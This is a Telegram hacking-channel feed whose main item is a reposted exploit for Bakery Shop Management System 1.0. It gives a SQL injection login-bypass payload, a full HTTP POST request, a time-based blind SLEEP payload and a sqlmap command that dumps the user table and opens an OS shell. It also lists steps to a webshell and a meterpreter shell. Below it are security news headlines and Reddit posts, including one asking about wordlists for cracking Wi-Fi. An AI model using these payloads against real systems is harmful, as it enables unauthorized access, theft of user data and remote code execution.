Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.8K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Bakery Shop Management System 1.0 SQL Injection

https://2.bp.blogspot.com/-8IZk1MGzGDs/WWlvRc2I8KI/AAAAAAAAINM/SaF41lFV3n4aBJrQBjJ2SaVGr7WaiJo3gCLcBGAs/s1600/h34.png
Bakery Shop Management System version 1.0 suffers from a remote blind SQL injection vulnerability that can lead to code execution and authentication bypass.

MD5 | 7563ba7c628bb1afba90da4c600c5295

Download
# Title: Bakery Shop Management System 1.0 - Blind Time SQLi To Rce
# Author: Hejap Zairy
# Date: 06.04.2022
# Vendor: https://www.campcodes.com/projects/php/simple-bakery-shop-management-system/
# Software: https://www.campcodes.com/wp-content/uploads/2022/02/bsms_0.zip
# Reference: https://github.com/Matrix07ksa
# Tested on: Windows, MySQL, Apache
# Steps
# 1.- Go to : https://0day.gov/bsms/login.php
# 2 - SQLi Authentication Bypass [admin'or 1=1 or ''=']
# 3 - SQLi To RCE r00t
# 4 - Ubload webshell
# 5 - Web Shell to meterpreter full tty shell
#vulnerability Code php

---
```

$sql = "SELECT p.*,c.name as cname FROM `product_list` p inner join `category_list` c on p.category_id = c.category_id where p.status = 1 and p.delete_flag = 0 order by `name` asc";
$qry = $conn->query($sql);
while($row = $qry->fetch_assoc()):
$stock_in = $conn->query("SELECT sum(quantity) as `total` FROM `stock_list` where unix_timestamp(CONCAT(`expiry_date`, ' 23:59:59')) >= unix_timestamp(CURRENT_TIMESTAMP) and product_id = '{$row['product_id']}' ")->fetch_array()['total'];
$stock_out = $conn->query("SELECT sum(quantity) as `total` FROM `transaction_items` where product_id = '{$row['product_id']}' ")->fetch_array()['total'];
$stock_in = $stock_in > 0 ? $stock_in : 0;
$stock_out = $stock_out > 0 ? $stock_out : 0;
$qty = $stock_in-$stock_out;
$qty = $qty > 0 ? $qty : 0;
?>
```
---
#Status: CRITICAL
[+] Payload POST

---
POST /bsms/Actions.php?a=login HTTP/1.1
Host: 0day.gov
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 48
Origin: http://0day.gov
Connection: close
Referer: https://0day.gov/bsms/login.php
Cookie: PHPSESSID=ttdhr0ntd2dte05a2quob2kr3s

username=admin'or+1%3D1+or+''%3D'&password=hejap
---
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin'or 1=1 or ''='' AND (SELECT 1610 FROM (SELECT(SLEEP(515)))eFaV) AND '515'='515&password=hejap
---

#Blind SQLi Time to Rce
#ُExploit

sqlmap -r hejap_0day --dbs --time-sec=10 --threads=10 -D bsms_db -T user_list --dump --eta --technique=t --os-shell

# Description:
The SQLi vulnerability We can use this information to construct an injection attack to bypass authentication.
# Proof and Exploit:
https://i.imgur.com/zR6Mekg.png
https://i.imgur.com/RQ1JXeK.png
https://i.imgur.com/0x9gepw.png


Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Dark Reading: Attacks/Breaches
Why XDR As We Know It Will Fail

Don't take the XDR hype at face value. Do security due diligence and add a connectivity level for data access across all silos for best response.
Dark Reading: Attacks/Breaches
Linux Systems Are Becoming Bigger Targets

To prevent Linux exploits, organizations should establish an integrated security approach that extends to the network edge.
Dark Reading: Attacks/Breaches
FBI-Led Operation Disrupts Russian GRU Botnet

"Cyclops Blink" operation disabled firewalls behind the Sandworm hacking team's network of infected victim devices.
How i got access to 1600k Users PII Data $$$$

Hello Guys 👋 I am Gokul, Python developer, Cyber security researcher, Part time Bug hunter and Open source tool maker, Studying 3rd year…Continue reading on Medium »
Read more...
hacking: security in practice
really just crunch, cupp, and mentalist?

So unfortunately I hit a writer's block when it comes to coming up with my word lists. I try to think the best way to compile one, crunches great for its versatility, cupp is great for its interaction and assisting, and The Mentalist is pretty good because the GUI and the multiple options to append and dates and nouns etc etc. But is there a way to create a word list with the options to take one word, appended with another random word and then add numbers or characters? Crunch has the -t yes, but what if I wanted to mash random WORDS together? I guess for instance pretty much just cracking Wi-Fi there's only part that I have troubles with for wordlists, is there not a wordlists with "default" router logins? Is reaver now obsolete?

submitted by /u/Sn0wbird187
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Malicious USB-C SD Card Reader?

Hey everyone, are you aware of any USB-C SD card reader devices being sold on Amazon that might try to hack connected PCs? I bought one and in 7 out of 10 times my laptop freezes/crashes and later it reported some issues with the trust platform (Win 11).

How could I verify?

submitted by /u/DaSchos
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Best way to save passwords?

Hey all I just saw this post about a guy findinf passwords stored in a very clever and creative way but it got me wondering; what’s a good way to store passwords? Figured this would also be the best place to ask

thanks and cheers!

submitted by /u/coolnow_
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video